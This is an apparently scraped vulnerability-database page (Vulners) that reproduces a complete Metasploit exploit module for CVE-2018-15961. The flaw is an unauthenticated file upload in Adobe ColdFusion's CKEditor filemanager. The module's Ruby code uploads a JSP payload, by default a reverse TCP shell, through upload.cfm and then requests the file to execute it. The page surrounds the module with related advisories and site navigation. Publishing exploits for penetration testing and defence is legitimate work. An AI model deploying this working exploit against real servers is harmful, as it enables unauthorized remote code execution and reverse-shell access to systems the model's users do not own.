Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adobe Coldfusion 11 CKEditor Arbitrary File Upload Exploit

🗓️ 10 Jan 2019 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 458 Views

Adobe ColdFusion 11 CKEditor unrestricted file upload vulnerability allowing JSP file executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Adobe ColdFusion 2018 - Arbitrary File Upload Vulnerability
12 Dec 201800:00
zdt
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Adobe Coldfusion
3 Oct 202123:31
githubexploit
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Adobe Coldfusion
30 Jun 202108:15
githubexploit
ATTACKERKB		Adobe ColdFusion CKEditor file upload
25 Sep 201800:00
attackerkb
ATTACKERKB		CVE-2018-15961
25 Sep 201800:00
attackerkb
BDU FSTEC		The vulnerability of the ColdFusion interpreter lies in the lack of restrictions on file uploads, which allows attackers to execute arbitrary code.
15 May 202000:00
bdu_fstec
Circl		CVE-2018-15961
12 Nov 201818:53
circl
CISA KEV Catalog		Adobe ColdFusion Unrestricted File Upload Vulnerability
3 Nov 202100:00
cisa_kev
CNVD		Adobe ColdFusion Arbitrary File Upload Vulnerability
12 Sep 201800:00
cnvd
Tenable Nessus		Adobe ColdFusion File Upload (APSB18-33) (CVE-2018-15961)
25 Oct 201900:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Adobe ColdFusion CKEditor unrestricted file upload',
      'Description'     => %q{
        A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
        (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
        ColdFusion 2018 (July 12 release) allows unauthenticated remote
        attackers to upload and execute JSP files through the filemanager
        plugin.
        Tested on Adobe ColdFusion 2018.0.0.310739.
      },
      'Author'          =>
        [
          'Pete Freitag de Foundeo',  # Vulnerability discovery
          'Vahagn vah_13 Vardanian',  # First public PoC
          'Qazeer'                    # Metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ 'CVE', '2018-15961' ],
          [ 'BID', '105314' ],
          [ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
        ],
      'Privileged'      => false,
      'Platform'        => %w{ linux win },
      'Arch'            => ARCH_JAVA,
      'Targets'         =>
        [
          [ 'Java Universal',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => %w{ linux win },
              'Payload'  => { 'DisableNops' => true },
              'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}
            }
          ]
        ],
      'DefaultTarget'   => 0,
      'DefaultOptions'  => { 'RPORT' => 8500 },
      'DisclosureDate'  => 'Sep 11 2018'
    ))

    register_options [
      OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
    ]
  end

  def exploit
    filename = rand_text_alpha_upper(1..10) + '.jsp'

    print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")

    mime = Rex::MIME::Message.new
    mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
    mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')

    post_str = mime.to_s
    post_str.strip!

    res = send_request_cgi({
      'uri'     => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),
      'version' => '1.1',
      'method'  => 'POST',
      'ctype'   => 'multipart/form-data; boundary=' + mime.bound,
      'data'    => post_str,
    })

    unless res && res.code == 200
      fail_with Failure::Unknown, 'Upload Failed...'
    end

    print_good('Upload succeeded! Executing payload...')

    send_request_cgi({
      'uri'     => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
                    'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
      'method' => 'GET'
    }, 5)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Jan 2019 00:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 3.19.8
CVSS 210
EPSS0.94393
adobe coldfusionckeditorfile uploadvulnerabilityjspexecutionmetasploitexploitremote code executionsecurity advisorycve-2018-15961
458